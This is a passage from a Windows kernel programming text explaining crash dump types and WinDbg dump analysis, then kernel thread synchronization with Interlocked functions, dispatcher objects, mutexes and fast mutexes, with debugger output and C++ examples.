optimization is not to include unused pages, but Complete Memory Dump does not do that.
• Automatic memory dump (Windows 8+) - this is the default on Windows 8 and later. This is the
same as kernel memory dump, but the kernel resizes the page file on boot to a size that guarantees
with high probability that the page file size would be large enough to contain a kernel dump. This
is only done if the page file size is specified as “System managed” (the default).
• Active memory dump (Windows 10+) - this is similar to a complete memory dump, with two
exceptions. First, unused pages are not written. Second, if the crashed system is hosting guest virtual
machines, the memory they were using at the time is not captured (as it’s unlikely these have
anything to do with the host crashing). These optimizations help in reducing the dump file size.
Crash Dump Information
Once you have a crash dump in hand, you can open it in WinDbg by selecting File/Open Dump File and
navigating to the file. The debugger will spew some basic information similar to the following:
Microsoft (R) Windows Debugger Version 10.0.18317.1001 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Windows\MEMORY.DMP]
Kernel Bitmap Dump File: Kernel address space is available, User address space may not be available.
************* Path validation summary **************
Response    Time (ms)    Location
Deferred                 SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 10 Kernel Version 18362 MP (4 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 18362.1.amd64fre.19h1_release.190318-1202
Machine Name:
Kernel base = 0xfffff803`70abc000 PsLoadedModuleList = 0xfffff803`70eff2d0
Debug session time: Wed Apr 24 15:36:55.613 2019 (UTC + 3:00)
System Uptime: 0 days 0:05:38.923
Loading Kernel Symbols
....................................Page 2001b5efc too large to be in the dump file.
Page 20001ebfb too large to be in the dump file.
...............................
Loading User Symbols
PEB is paged out (Peb.Ldr = 00000054`34256018). Type ".hh dbgerr001" for details
Loading unloaded module list
.............
For analysis of this file, run !analyze -v
nt!KeBugCheckEx:
fffff803`70c78810 48894c2408      mov     qword ptr [rsp+8],rcx ss:fffff988`53b0f6b0=000000000000000a
The debugger suggests running !analyze -v and it’s the most common thing to do at the start of dump
analysis. Notice the call stack is at KeBugCheckEx, which is the function generating the bugcheck.
The default logic behind !analyze -v performs basic analysis on the thread that caused the crash and
shows a few pieces of information related to the crash dump code:
2: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: ffffd907b0dc7660, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000000, value 0 = read operation, 1 = write operation
Arg4: fffff80375261530, address which referenced memory
Debugging Details:
------------------
(truncated)
DUMP_TYPE:  1

BUGCHECK_P1: ffffd907b0dc7660
BUGCHECK_P2: 2
BUGCHECK_P3: 0
BUGCHECK_P4: fffff80375261530

READ_ADDRESS: Unable to get offset of nt!_MI_VISIBLE_STATE.SpecialPool
Unable to get value of nt!_MI_VISIBLE_STATE.SessionSpecialPool
 ffffd907b0dc7660 Paged pool

CURRENT_IRQL:  2

FAULTING_IP:
myfault+1530
fffff803`75261530 8b03            mov     eax,dword ptr [rbx]
(truncated)
ANALYSIS_VERSION: 10.0.18317.1001 amd64fre
TRAP_FRAME:  fffff98853b0f7f0 -- (.trap 0xfffff98853b0f7f0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffd90797400340
rdx=0000000000000880 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80375261530 rsp=fffff98853b0f980 rbp=0000000000000002
 r8=ffffd9079c5cec10  r9=0000000000000000 r10=ffffd907974002c0
r11=ffffd907b0dc1650 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
myfault+0x1530:
fffff803`75261530 8b03            mov     eax,dword ptr [rbx] ds:00000000`00000000=????????
Resetting default scope
LAST_CONTROL_TRANSFER:  from fffff80370c8a469 to fffff80370c78810
STACK_TEXT:
fffff988`53b0f6a8 fffff803`70c8a469 : 00000000`0000000a ffffd907`b0dc7660 00000\
000`00000002 00000000`00000000 : nt!KeBugCheckEx
fffff988`53b0f6b0 fffff803`70c867a5 : ffff8788`e4604080 ffffff4c`c66c7010 00000\
000`00000003 00000000`00000880 : nt!KiBugCheckDispatch+0x69
fffff988`53b0f7f0 fffff803`75261530 : ffffff4c`c66c7000 00000000`00000000 fffff\
988`53b0f9e0 00000000`00000000 : nt!KiPageFault+0x465
fffff988`53b0f980 fffff803`75261e2d : fffff988`00000000 00000000`00000000 ffff8\
788`ec7cf520 00000000`00000000 : myfault+0x1530
fffff988`53b0f9b0 fffff803`75261f88 : ffffff4c`c66c7010 00000000`000000f0 00000\
000`00000001 ffffff30`21ea80aa : myfault+0x1e2d
fffff988`53b0fb00 fffff803`70ae3da9 : ffff8788`e6d8e400 00000000`00000001 00000\
000`83360018 00000000`00000001 : myfault+0x1f88
fffff988`53b0fb40 fffff803`710d1dd5 : fffff988`53b0fec0 ffff8788`e6d8e400 00000\
000`00000001 ffff8788`ecdb6690 : nt!IofCallDriver+0x59
fffff988`53b0fb80 fffff803`710d172a : ffff8788`00000000 00000000`83360018 00000\
000`00000000 fffff988`53b0fec0 : nt!IopSynchronousServiceTail+0x1a5
fffff988`53b0fc20 fffff803`710d1146 : 00000054`344feb28 00000000`00000000 00000\
000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x5ca
fffff988`53b0fd60 fffff803`70c89e95 : ffff8788`e4604080 fffff988`53b0fec0 00000\
054`344feb28 fffff988`569fd630 : nt!NtDeviceIoControlFile+0x56
fffff988`53b0fdd0 00007ff8`ba39c147 : 00000000`00000000 00000000`00000000 00000\
000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25
00000054`344feb48 00000000`00000000 : 00000000`00000000 00000000`00000000 00000\
000`00000000 00000000`00000000 : 0x00007ff8`ba39c147
(truncated)
FOLLOWUP_IP:
myfault+1530
fffff803`75261530 8b03            mov     eax,dword ptr [rbx]

FAULT_INSTR_CODE:  8d48038b

SYMBOL_STACK_INDEX:  3

SYMBOL_NAME:  myfault+1530

FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: myfault
IMAGE_NAME:
myfault.sys
(truncated)
Every crash dump code can have up to 4 numbers that provide more information about the crash. In this
case, we can see the code is DRIVER_IRQL_NOT_LESS_OR_EQUAL (0xd1) and the next four numbers
named Arg1 through Arg4 mean (in order): memory referenced, the IRQL at the time of the call, read vs.
write operation and the accessing address.
The command clearly recognizes myfault.sys as the faulting module (driver). That's because this is an easy
crash - the culprit is on the call stack, as can be seen in the STACK_TEXT section above (you can also simply
use the k command to see it again).
The !analyze -v command is extensible and it’s possible to add more analysis to that
command using an extension DLL. You may be able to find such extensions on the web. Consult
the debugger API documentation for more information on how to add your own analysis code
to this command.
More complex crash dumps may show only calls from the kernel on the call stack of the offending thread.
Before you conclude that you found a bug in the Windows kernel, consider this more likely scenario: a
driver did something that was not fatal in itself, such as a buffer overflow - writing data beyond its
allocated buffer. Unfortunately, the memory following that buffer was allocated by some other driver or
the kernel, and so nothing bad happened at that time. Some time later, the kernel accessed that memory,
got bad data, and caused a system crash. But the faulting driver is nowhere to be found on any call stack;
this is much harder to diagnose.
One way to help diagnose such issues is using Driver Verifier. We’ll look at the basics of Driver
Verifier in module 12.
Once you get the crash dump code, it’s helpful to look in the debugger documentation at the
topic “Bugcheck Code Reference”, where common bugcheck codes are explained more fully
with typical causes and ideas on what to investigate next.
Analyzing a Dump File
A dump file is a snapshot of a system's memory. Working with one is otherwise the same as any other
kernel debugging session - you just can't set breakpoints, and certainly cannot use any go command. All
other commands are available as usual. Commands such as !process, !thread, lm, and k can be used normally.
Here are some other commands and tips:
• The prompt indicates the current processor. Switching processors can be done with the command
~Ns where N is the CPU index (it looks like switching threads in user mode).
• The !running command can be used to list the threads that were running on all processors at the
time of the crash. Adding -t as an option shows the call stack for each thread. Here is an example
with the above crash dump:
2: kd> !running -t

System Processors:  (000000000000000f)
Idle Processors:  (0000000000000002)

     Prcbs             Current         (pri) Next            (pri) Idle
  0  fffff8036ef3f180  ffff8788e91cf080 ( 8)                       fffff80371048400  ................

 # Child-SP          RetAddr           Call Site
00 00000094`ed6ee8a0 00000000`00000000 0x00007ff8`b74c4b57

  2  ffffb000c1944180  ffff8788e4604080 (12)                       ffffb000c1955140  ................

 # Child-SP          RetAddr           Call Site
00 fffff988`53b0f6a8 fffff803`70c8a469 nt!KeBugCheckEx
01 fffff988`53b0f6b0 fffff803`70c867a5 nt!KiBugCheckDispatch+0x69
02 fffff988`53b0f7f0 fffff803`75261530 nt!KiPageFault+0x465
03 fffff988`53b0f980 fffff803`75261e2d myfault+0x1530
04 fffff988`53b0f9b0 fffff803`75261f88 myfault+0x1e2d
05 fffff988`53b0fb00 fffff803`70ae3da9 myfault+0x1f88
06 fffff988`53b0fb40 fffff803`710d1dd5 nt!IofCallDriver+0x59
07 fffff988`53b0fb80 fffff803`710d172a nt!IopSynchronousServiceTail+0x1a5
08 fffff988`53b0fc20 fffff803`710d1146 nt!IopXxxControlFile+0x5ca
09 fffff988`53b0fd60 fffff803`70c89e95 nt!NtDeviceIoControlFile+0x56
0a fffff988`53b0fdd0 00007ff8`ba39c147 nt!KiSystemServiceCopyEnd+0x25
0b 00000054`344feb48 00000000`00000000 0x00007ff8`ba39c147
  3  ffffb000c1c80180  ffff8788e917e0c0 ( 5)                       ffffb000c1c91140  ................

 # Child-SP          RetAddr           Call Site
00 fffff988`5683ec38 fffff803`70ae3da9 Ntfs!NtfsFsdClose
01 fffff988`5683ec40 fffff803`702bb5de nt!IofCallDriver+0x59
02 fffff988`5683ec80 fffff803`702b9f16 FLTMGR!FltpLegacyProcessingAfterPreCallb\
acksCompleted+0x15e
03 fffff988`5683ed00 fffff803`70ae3da9 FLTMGR!FltpDispatch+0xb6
04 fffff988`5683ed60 fffff803`710cfe4d nt!IofCallDriver+0x59
05 fffff988`5683eda0 fffff803`710de470 nt!IopDeleteFile+0x12d
06 fffff988`5683ee20 fffff803`70aea9d4 nt!ObpRemoveObjectRoutine+0x80
07 fffff988`5683ee80 fffff803`723391f5 nt!ObfDereferenceObject+0xa4
08 fffff988`5683eec0 fffff803`72218ca7 Ntfs!NtfsDeleteInternalAttributeStream+0\
x111
09 fffff988`5683ef00 fffff803`722ff7cf Ntfs!NtfsDecrementCleanupCounts+0x147
0a fffff988`5683ef40 fffff803`722fe87d Ntfs!NtfsCommonCleanup+0xadf
0b fffff988`5683f390 fffff803`70ae3da9 Ntfs!NtfsFsdCleanup+0x1ad
0c fffff988`5683f6e0 fffff803`702bb5de nt!IofCallDriver+0x59
0d fffff988`5683f720 fffff803`702b9f16 FLTMGR!FltpLegacyProcessingAfterPreCallb\
acksCompleted+0x15e
0e fffff988`5683f7a0 fffff803`70ae3da9 FLTMGR!FltpDispatch+0xb6
0f fffff988`5683f800 fffff803`710ccc38 nt!IofCallDriver+0x59
10 fffff988`5683f840 fffff803`710d4bf8 nt!IopCloseFile+0x188
11 fffff988`5683f8d0 fffff803`710d9f3e nt!ObCloseHandleTableEntry+0x278
12 fffff988`5683fa10 fffff803`70c89e95 nt!NtClose+0xde
13 fffff988`5683fa80 00007ff8`ba39c247 nt!KiSystemServiceCopyEnd+0x25
14 000000b5`aacf9df8 00000000`00000000 0x00007ff8`ba39c247
The command gives a pretty good idea of what was going on at the time of the crash.
• The !stacks command lists thread stacks for all threads by default. A more useful variant is passing a
search string, which lists only threads where a module or function containing this string appears. This
allows locating a driver's code throughout the system (the driver may not have been running at the
time of the crash, but it may be on some thread's call stack). Here's an example for the above dump:
2: kd> !stacks
Proc.Thread  .Thread           Ticks   ThreadState Blocker
                            [fffff803710459c0 Idle]
   0.000000  fffff80371048400 0000003 RUNNING     nt!KiIdleLoop+0x15e
   0.000000  ffffb000c17b1140 0000ed9 RUNNING     hal!HalProcessorIdle+0xf
   0.000000  ffffb000c1955140 0000b6e RUNNING     nt!KiIdleLoop+0x15e
   0.000000  ffffb000c1c91140 000012b RUNNING     nt!KiIdleLoop+0x15e
                            [ffff8788d6a81300 System]
   4.000018  ffff8788d6b8a080 0005483 Blocked     nt!PopFxEmergencyWorker+0x3e
   4.00001c  ffff8788d6bc5140 0000982 Blocked     nt!ExpWorkQueueManagerThread+0x127
   4.000020  ffff8788d6bc9140 000085a Blocked     nt!KeRemovePriQueue+0x25c
(truncated)
2: kd> !stacks 0 myfault
Proc.Thread  .Thread           Ticks   ThreadState Blocker
                            [fffff803710459c0 Idle]
                            [ffff8788d6a81300 System]
(truncated)
                            [ffff8788e99070c0 notmyfault64.exe]
 af4.00160c  ffff8788e4604080 0000006 RUNNING     nt!KeBugCheckEx
(truncated)
The address next to each line is the thread’s ETHREAD address that can be fed to the !thread command.
System Hang
A system crash is the most common type of dump that is typically investigated. However, there is yet
another type of dump that you may need to work with: a hung system. A hung system is a non-responsive
or near non-responsive system. Things seem to be halted or deadlocked in some way - the system does
not crash, so the first issue to deal with is how to get a dump of the system.
A dump file contains system state; it does not have to be related to a crash or any other bad state.
There are tools (including the kernel debugger) that can generate a dump file at any time.
If the system is still responsive to some extent, the Sysinternals NotMyFault tool can force a system crash
and so force a dump file to be generated (this is in fact the way the dump in the previous section was
generated). Figure 6-8 shows a screenshot of NotMyFault. Selecting the first (default) option and clicking
Crash immediately crashes the system and will generate a dump file (if configured to do so).
Figure 6-8: NotMyFault
NotMyFault uses a driver, myfault.sys, that is actually responsible for the crash.
NotMyFault has 32 and 64 bit versions (the latter's file name ends with "64"). Remember to use
the correct one for the system at hand; otherwise, its driver will fail to load.
If the system is completely unresponsive, and you can attach a kernel debugger (the target was configured
for debugging), then debug normally or generate a dump file using the .dump command.
If the system is unresponsive and a kernel debugger cannot be attached, it’s possible to generate a crash
manually if configured in the Registry beforehand (this assumes the hang was somehow expected). When
a certain key combination is detected, the keyboard driver will generate a crash. Consult this link¹ to get
the full details. The crash code in this case is 0xe2 (MANUALLY_INITIATED_CRASH).
¹https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard
Thread Synchronization
Threads sometimes need to coordinate work. A canonical example is a driver using a linked list to gather
data items. The driver can be invoked by multiple clients, coming from many threads in one or more
processes. This means manipulating the linked list must be done atomically, so it’s not corrupted. If multiple
threads access the same memory where at least one is a writer (making changes), this is referred to as a
data race. If a data race occurs, all bets are off and anything can happen. Typically, within a driver, a
system crash occurs sooner or later; data corruption is practically guaranteed.
In such a scenario, it’s essential that while one thread manipulates the linked list, all other threads back
off the linked list, and wait in some way for the first thread to finish its work. Only then another thread
(just one) can manipulate the list. This is an example of thread synchronization.
The kernel provides several primitives that help in accomplishing proper synchronization to protect
data from concurrent access. The following sections discuss various primitives and techniques for
thread synchronization.
Interlocked Operations
The Interlocked set of functions provide convenient operations that are performed atomically by utilizing
the hardware, which means no software objects are involved. If using these functions gets the job done,
then they should be used, as these are as efficient as they can possibly be.
Technically, these Interlocked-family functions are called compiler intrinsics, as they are
instructions to the processor, disguised as functions.
The same functions (intrinsics) are available in user-mode as well.
A simple example is incrementing an integer by one. Generally, this is not an atomic operation. If two (or
more) threads try to perform this at the same time on the same memory location, it’s possible (and likely)
some of the increments will be lost. Figure 6-9 shows a simple scenario where incrementing a value by 1
done from two threads ends up with result of 1 instead of 2.
Figure 6-9: Concurrent increment
The example in figure 6-9 is extremely simplistic. With real CPUs there are other effects to
consider, especially caching, which makes the shown scenario even more likely. CPU caching,
store buffers, and other aspects of modern CPUs are non-trivial topics, well beyond the scope
of this book.
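The lost-update scenario in figure 6-9 is easy to reproduce with a plain integer, and just as easy to fix with an atomic increment. The following user-mode C++ sketch (an analog only - it uses std::atomic rather than the kernel's InterlockedIncrement, though both compile down to the same kind of atomic hardware instruction) shows two threads incrementing a shared counter with no lost updates:

```cpp
#include <atomic>
#include <thread>

// shared counter; fetch_add performs the increment atomically in hardware
std::atomic<int> g_counter{ 0 };

void Worker() {
    for (int i = 0; i < 100'000; ++i)
        g_counter.fetch_add(1);   // user-mode analog of InterlockedIncrement
}

int RunCounterDemo() {
    g_counter = 0;
    std::thread t1(Worker), t2(Worker);
    t1.join();
    t2.join();
    return g_counter.load();      // no increments lost: always 200,000
}
```

Replacing fetch_add with a plain `++` on a non-atomic int would make the final count unpredictable, which is exactly the data race described above.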
Table 6-2 lists some of the Interlocked functions available for driver use.
Table 6-2: Some Interlocked functions

Function                                  Description
InterlockedIncrement /
InterlockedIncrement16 /
InterlockedIncrement64                    Atomically increment a 32/16/64-bit integer by one
InterlockedDecrement / 16 / 64            Atomically decrement a 32/16/64-bit integer by one
InterlockedAdd / InterlockedAdd64         Atomically add one 32/64-bit integer to a variable
InterlockedExchange / 8 / 16 / 64         Atomically exchange two 32/8/16/64-bit values
InterlockedCompareExchange / 64 / 128     Atomically compare a variable with a value. If equal,
                                          exchange with the provided value and return TRUE;
                                          otherwise, place the current value in the variable
                                          and return FALSE
The InterlockedCompareExchange family of functions are used in lock-free programming,
a programming technique to perform complex atomic operations without using software
objects. This topic is well beyond the scope of this book.
The functions in table 6-2 are also available in user mode, as these are not really functions, but
rather CPU intrinsics - special instructions to the CPU.
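To give a taste of what compare-exchange enables, here is a minimal user-mode sketch of a lock-free (Treiber) stack built on std::atomic's compare_exchange_weak, the C++ analog of the InterlockedCompareExchange family. This is purely illustrative - production lock-free code must also handle issues such as the ABA problem, which this sketch ignores:

```cpp
#include <atomic>

// minimal lock-free stack: the head pointer is swapped atomically
// with compare-exchange, retrying if another thread got there first
template<typename T>
struct LockFreeStack {
    struct Node { T Value; Node* Next; };

    void Push(T value) {
        auto node = new Node{ value, _head.load() };
        // on failure, compare_exchange_weak reloads the current head
        // into node->Next, so we simply retry
        while (!_head.compare_exchange_weak(node->Next, node))
            ;
    }

    bool Pop(T& value) {
        auto node = _head.load();
        while (node && !_head.compare_exchange_weak(node, node->Next))
            ;
        if (!node)
            return false;   // stack was empty
        value = node->Value;
        delete node;
        return true;
    }

private:
    std::atomic<Node*> _head{ nullptr };
};
```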
Dispatcher Objects
The kernel provides a set of primitives known as Dispatcher Objects, also called Waitable Objects. These
objects have a state, either signaled or non-signaled, where the meaning of signaled and non-signaled
depends on the type of object. They are called “waitable” because a thread can wait on such objects until
they become signaled. While waiting, the thread does not consume CPU cycles as it’s in a Waiting state.
The primary functions used for waiting are KeWaitForSingleObject and KeWaitForMultipleOb-
jects. Their prototypes (with simplified SAL annotations for clarity) are shown below:
NTSTATUS KeWaitForSingleObject (
_In_ PVOID Object,
_In_ KWAIT_REASON WaitReason,
_In_ KPROCESSOR_MODE WaitMode,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout);
NTSTATUS KeWaitForMultipleObjects (
_In_ ULONG Count,
_In_reads_(Count) PVOID Object[],
_In_ WAIT_TYPE WaitType,
_In_ KWAIT_REASON WaitReason,
_In_ KPROCESSOR_MODE WaitMode,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout,
_Out_opt_ PKWAIT_BLOCK WaitBlockArray);
Here is a rundown of the arguments to these functions:
• Object - specifies the object to wait for. Note these functions work with objects, not handles. If you
have a handle (maybe provided by user mode), call ObReferenceObjectByHandle to get the
pointer to the object.
• WaitReason - specifies the wait reason. The list of wait reasons is pretty long, but drivers should
typically set it to Executive, unless it’s waiting because of a user request, and if so specify
UserRequest.
• WaitMode - can be UserMode or KernelMode. Most drivers should specify KernelMode.
• Alertable - indicates if the thread should be in an alertable state during the wait. Alertable state
allows delivering of user mode Asynchronous Procedure Calls (APCs). User mode APCs can be
delivered if wait mode is UserMode. Most drivers should specify FALSE.
• Timeout - specifies the time to wait. If NULL is specified, the wait is indefinite - as long as it takes for
the object to become signaled. The units of this argument are in 100nsec chunks, where a negative
number is relative wait, while a positive number is an absolute wait measured from January 1, 1601
at midnight.
• Count - the number of objects to wait on.
• Object[] - an array of object pointers to wait on.
• WaitType - specifies whether to wait for all objects to become signaled at once (WaitAll) or just
one object (WaitAny).
• WaitBlockArray - an array of structures used internally to manage the wait operation. It’s optional if
the number of objects is <= THREAD_WAIT_OBJECTS (currently 3) - the kernel will use the built-in
array present in each thread. If the number of objects is higher, the driver must allocate the correct
size of structures from non-paged memory, and deallocate them after the wait is over.
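The Timeout units deserve a quick example. A relative wait of, say, one second must be passed as a negative count of 100-nsec intervals. The conversion drivers typically perform can be sketched as follows (the helper name is made up for illustration; a LARGE_INTEGER's QuadPart is modeled here as a plain 64-bit integer):

```cpp
#include <cstdint>

// Convert milliseconds to the relative-timeout format expected by
// KeWaitForSingleObject/KeWaitForMultipleObjects: units of 100 nsec,
// negated to indicate a relative (rather than absolute) wait.
// (Hypothetical helper name, not a kernel API.)
constexpr std::int64_t RelativeTimeoutFromMs(std::int64_t milliseconds) {
    // 1 msec = 1,000,000 nsec = 10,000 units of 100 nsec
    return -10'000LL * milliseconds;
}
```

A driver would store this value in a LARGE_INTEGER's QuadPart and pass its address as the Timeout argument; a one-second relative wait, for example, is -10,000,000.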
The main return values from KeWaitForSingleObject are:
• STATUS_SUCCESS - the wait is satisfied because the object state has become signaled.
• STATUS_TIMEOUT - the wait is satisfied because the timeout has elapsed.
Note that all return values from the wait functions pass the NT_SUCCESS macro (it evaluates to true for them).
KeWaitForMultipleObjects return values include STATUS_TIMEOUT just as KeWaitForSingleOb-
ject. STATUS_SUCCESS is returned if WaitAll wait type is specified and all objects become signaled.
For WaitAny waits, if one of the objects became signaled, the return value is STATUS_WAIT_0 plus its
index in the array of objects (Note that STATUS_WAIT_0 is defined to be zero).
There are some fine details associated with the wait functions, especially if wait mode is
UserMode and the wait is alertable. Check the WDK docs for the details.
Table 6-3 lists some of the common dispatcher objects and the meaning of signaled and non-signaled for
these objects.
Table 6-3: Object Types and signaled meaning

Object Type   Signaled meaning                              Non-Signaled meaning
Process       process has terminated (for whatever reason)  process has not terminated
Thread        thread has terminated (for whatever reason)   thread has not terminated
Mutex         mutex is free (unowned)                       mutex is held
Event         event is set                                  event is reset
Semaphore     semaphore count is greater than zero          semaphore count is zero
Timer         timer has expired                             timer has not yet expired
File          asynchronous I/O operation completed          asynchronous I/O operation is in progress
All the object types from table 6-3 are also exported to user mode. The primary waiting
functions in user mode are WaitForSingleObject and WaitForMultipleObjects.
The following sections will discuss some of common object types useful for synchronization in drivers.
Some other objects will be discussed as well that are not dispatcher objects, but support waiting as well.
Mutex
Mutex is the classic object for the canonical problem of one thread among many that can access a shared
resource at any one time.
Mutex is sometimes referred to as Mutant (its original name). These are the same thing.
A mutex is signaled when it’s free. Once a thread calls a wait function and the wait is satisfied, the mutex
becomes non-signaled and the thread becomes the owner of the mutex. Ownership is critical for a mutex.
It means the following:
• If a thread is the owner of a mutex, it’s the only one that can release the mutex.
• A mutex can be acquired more than once by the same thread. The second attempt succeeds
automatically since the thread is the current owner of the mutex. This also means the thread needs
to release the mutex the same number of times it was acquired; only then the mutex becomes free
(signaled) again.
Using a mutex requires allocating a KMUTEX structure from non-paged memory. The mutex API contains
the following functions working on that KMUTEX:
• KeInitializeMutex or KeInitializeMutant must be called once to initialize the mutex.
• One of the waiting functions, passing the address of the allocated KMUTEX structure.
• KeReleaseMutex is called when a thread that is the owner of the mutex wants to release it.
Here are the definitions of the APIs that can initialize a mutex:
VOID KeInitializeMutex (
    _Out_ PKMUTEX Mutex,
    _In_ ULONG Level);

VOID KeInitializeMutant (      // defined in ntifs.h
    _Out_ PKMUTANT Mutant,
    _In_ BOOLEAN InitialOwner);
The Level parameter in KeInitializeMutex is not used, so zero is as good a value as any. KeIni-
tializeMutant allows specifying whether the current thread should be the initial owner of the mutex.
KeInitializeMutex initializes the mutex to be unowned.
Releasing the mutex is done with KeReleaseMutex:
LONG KeReleaseMutex (
_Inout_ PKMUTEX Mutex,
_In_ BOOLEAN Wait);
The returned value is the previous state of the mutex object (including recursive ownership count), and
should mostly be ignored (although it may sometimes be useful for debugging purposes). The Wait
parameter indicates whether the next API call is going to be one of the wait functions. This is used as
a hint to the kernel that can optimize slightly if the thread is about to enter a wait state.
As part of calling KeReleaseMutex, the IRQL is raised to DISPATCH_LEVEL. If
Wait is TRUE, the IRQL is not lowered, which allows the next wait function
(KeWaitForSingleObject or KeWaitForMultipleObjects) to execute more efficiently, as
no context switch can interfere.
Given the above functions, here is an example using a mutex to access some shared data so that only a
single thread does so at a time:
KMUTEX MyMutex;
LIST_ENTRY DataHead;
void Init() {
KeInitializeMutex(&MyMutex, 0);
}
void DoWork() {
// wait for the mutex to be available
KeWaitForSingleObject(&MyMutex, Executive, KernelMode, FALSE, nullptr);
// access DataHead freely
// once done, release the mutex
KeReleaseMutex(&MyMutex, FALSE);
}
It’s important to release the mutex no matter what, so it’s better to use __try / __finally to make sure
it’s executed however the __try block is exited:
void DoWork() {
// wait for the mutex to be available
KeWaitForSingleObject(&MyMutex, Executive, KernelMode, FALSE, nullptr);
__try {
// access DataHead freely
}
__finally {
// once done, release the mutex
KeReleaseMutex(&MyMutex, FALSE);
}
}
Figure 6-10 shows two threads attempting to acquire the mutex at roughly the same time, as they want to
access the same data. One thread succeeds in acquiring the mutex, the other has to wait until the mutex
is released by the owner before it can acquire it.
Figure 6-10: Acquiring a mutex
Since using __try/__finally is a bit awkward, we can use C++ to create a RAII wrapper for waits. This
could also be used for other synchronization primitives.
First, we’ll create a mutex wrapper that provides functions named Lock and Unlock:
struct Mutex {
void Init() {
KeInitializeMutex(&_mutex, 0);
}
void Lock() {
KeWaitForSingleObject(&_mutex, Executive, KernelMode, FALSE, nullptr);
}
void Unlock() {
KeReleaseMutex(&_mutex, FALSE);
}
private:
KMUTEX _mutex;
};
Then we can create a generic RAII wrapper for waiting for any type that has a Lock and Unlock functions:
template<typename TLock>
struct Locker {
explicit Locker(TLock& lock) : _lock(lock) {
lock.Lock();
}
~Locker() {
_lock.Unlock();
}
private:
TLock& _lock;
};
With these definitions in place, we can replace the code using the mutex with the following:
Mutex MyMutex;
void Init() {
MyMutex.Init();
}
void DoWork() {
Locker<Mutex> locker(MyMutex);
// access DataHead freely
}
Since locking should be done for the shortest time possible, you can use an artificial C/C++
scope containing Locker and the code to execute while the mutex is owned, to acquire the
mutex as late as possible and release it as soon as possible.
With C++17 and later, Locker can be used without specifying the template argument, like so:
Locker locker(MyMutex);
Since Visual Studio currently uses C++14 as its default language standard, you'll have to change
that in the project properties, under the General node / C++ Language Standard.
We’ll use the same Locker type with other synchronization primitives in subsequent sections.
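To see the Locker pattern in action outside the kernel, here is a user-mode sketch in which the KMUTEX-based wrapper is replaced by one backed by std::mutex (an assumption made purely so the example is runnable anywhere); the Locker template itself is unchanged from the text, and the artificial scope acquires the mutex as late as possible and releases it as early as possible:

```cpp
#include <mutex>

// same Lock/Unlock interface as the kernel Mutex wrapper,
// backed by std::mutex instead of KMUTEX
struct Mutex {
    void Lock()   { _mutex.lock(); }
    void Unlock() { _mutex.unlock(); }
private:
    std::mutex _mutex;
};

// identical to the Locker template shown above
template<typename TLock>
struct Locker {
    explicit Locker(TLock& lock) : _lock(lock) { lock.Lock(); }
    ~Locker() { _lock.Unlock(); }
private:
    TLock& _lock;
};

Mutex MyMutex;
int SharedData;

int DoWork() {
    {   // artificial scope: mutex held only for the shared access itself
        Locker<Mutex> locker(MyMutex);   // C++17 allows just Locker locker(...)
        ++SharedData;
    }   // ~Locker releases the mutex here
    // work that doesn't need the mutex continues...
    return SharedData;
}
```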
Abandoned Mutex
A thread that acquires a mutex becomes the mutex owner. The owner thread is the only one that can
release the mutex. What happens to the mutex if the owner thread dies for whatever reason? The mutex
then becomes an abandoned mutex. The kernel explicitly releases the mutex (as no thread can do it) to
prevent a deadlock, so another thread would be able to acquire that mutex normally. However, the returned
value from the next successful wait call is STATUS_ABANDONED rather than STATUS_SUCCESS. A driver
should log such an occurrence, as it frequently indicates a bug.
Other Mutex Functions
Mutexes support a few miscellaneous functions that may be useful at times, mostly for debugging purposes.
KeReadStateMutex returns the current state (recursive count) of the mutex, where 0 means “unowned”:
LONG KeReadStateMutex (_In_ PKMUTEX Mutex);
Just remember that after the call returns, the result may no longer be correct as the mutex state may have
changed because some other thread has acquired or released the mutex before the code gets to examine
the result. The benefit of this function is in debugging scenarios only.
You can get the current mutex owner with a call to KeQueryOwnerMutant (defined in <ntifs.h>) as a
CLIENT_ID data structure, containing the thread and process IDs:
VOID KeQueryOwnerMutant (
_In_ PKMUTANT Mutant,
_Out_ PCLIENT_ID ClientId);
Just like with KeReadStateMutex, the returned information may be stale if other threads are doing work
with that mutex.
Fast Mutex
A fast mutex is an alternative to the classic mutex, providing better performance. It’s not a dispatcher
object, and so has its own API for acquiring and releasing it. A fast mutex has the following characteristics
compared with a regular mutex:
• A fast mutex cannot be acquired recursively. Doing so causes a deadlock.
• When a fast mutex is acquired, the CPU IRQL is raised to APC_LEVEL (1). This prevents any delivery
of APCs to that thread.
• A fast mutex can only be waited on indefinitely - there is no way to specify a timeout.
Because of the first two bullets above, the fast mutex is slightly faster than a regular mutex. In fact, most
drivers requiring a mutex use a fast mutex unless there is a compelling reason to use a regular mutex.
Don’t use I/O operations while holding on to a fast mutex. I/O completions are delivered with
a special kernel APC, but those are blocked while holding a fast mutex, creating a deadlock.
A fast mutex is initialized by allocating a FAST_MUTEX structure from non-paged memory and calling
ExInitializeFastMutex. Acquiring the mutex is done with ExAcquireFastMutex or ExAcquire-
FastMutexUnsafe (if the current IRQL happens to be APC_LEVEL already). Releasing a fast mutex is
accomplished with ExReleaseFastMutex or ExReleaseFastMutexUnsafe.
Semaphore
The primary goal of a semaphore is to limit something, such as the length of a queue. The semaphore
